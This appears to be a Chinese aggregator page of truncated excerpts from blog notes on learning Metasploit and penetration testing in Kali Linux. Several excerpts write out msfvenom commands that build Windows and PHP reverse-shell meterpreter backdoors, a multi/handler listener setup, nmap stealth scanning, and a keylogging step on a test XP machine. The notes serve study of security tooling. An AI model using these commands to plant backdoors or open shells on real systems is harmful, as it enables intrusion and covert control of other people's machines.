Metasploit笔记】的更多相关文章

目录一.名词解释···································································· 3二.msf基础··································································· 3三.信息探测与收集··························································· 4四.基本漏洞扫描··················…
书籍参考:Metasploit渗透指南 Nmap:使用没有时 ubuntu自动提示安装命令 用法: nmap -sS -Pn  192.168.1.0 -sS:执行一次隐秘的tcp扫描 -Pn:不使用ping命令预先判断主机是否存活,而是默认所有主机都是存活状态 Metasploit使用PostgreSQL数据库: 参考:http://www.cnblogs.com/zheh/p/4024723.html msf > db_connect postgres:你的数据库密码@127.0.0.1/m…
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe 生成PHP后门 msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php 使用监听模块(默认) use exploit/multi/handler set payload windows/meterpreter/rever…
Powershell Remoting建立在windows WinRM服务之上,可以一对一或一对多远程控制,也可以建立HTTP 或 HTTPS的“listeners”,使用WS-MAM协议接收远程传递的命令. Windows 远程管理(WinRM)是 WS-Management 协议的 Microsoft 实现,该协议为使用 Web 服务的本地计算机和远程计算机之间的通信提供了一种安全的方式. 也就是说在WS-MAN协议基础上,客户端运行环境可以多样化. 比如openwsman. 图片来源:v3…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me) 0x01 在kali中使用metasploit 在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录了.这一点比bt5要…
继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)         Sql注入攻击:大致分为 普通注入和盲注         跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS         跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求.         会话认证管理缺陷:…
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器.下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~ 一.情报搜集     1.外围信息搜集       外围信息搜集又叫公开渠道信息搜集.搜索引擎,公共信息库,目标门户网站等等都是很好的入手点.metasploit有一类“辅助模块”,可以帮助你进行信息搜集的工作,并且还集成了nmap等神器.       1.1通过DNS和IP挖掘目标网站的信息            ①who…
Metasploit是个好东西 主要参考了<Metasploit渗透测试魔鬼训练营>这本书. 一.先用自己的靶机感受一下该工具的强大 linux靶机的ip如图 按照书上写的配置,如图 然后就获得了靶机的root权限,如图是我的实验结果 有关Python 目前在sectools上排名23的是Perl/Python/Ruby,这几种脚本语言,因为我只会python,所以只介绍它.在你翔之星一些简单的功能又找不到合适的工具的时候,自己写是最快最方便的,python无疑是一利器.关于其教程,我在这里贴…
Metasploit学习笔记(博主推荐) 继续上面的博客 metasploit.meterpreter的基本使用: 首先来获取当前系统(即xp)下的正在运行的一些进程 获得进程之后,我们通过migrate来注入到其中的一个进程里面去. 那么使用哪一个进程呢?最好去选择就是桌面程序. 即,目标主机XP系统那边,的键盘记录,都将会存在这个文件里. 好的,去XP系统那边,随便输入啥吧 501代表权限,不是真实的哈希值. 有了这个哈希值的用途 (1): 可以找一些在线的破解网端.可以直接破解出来 (2)…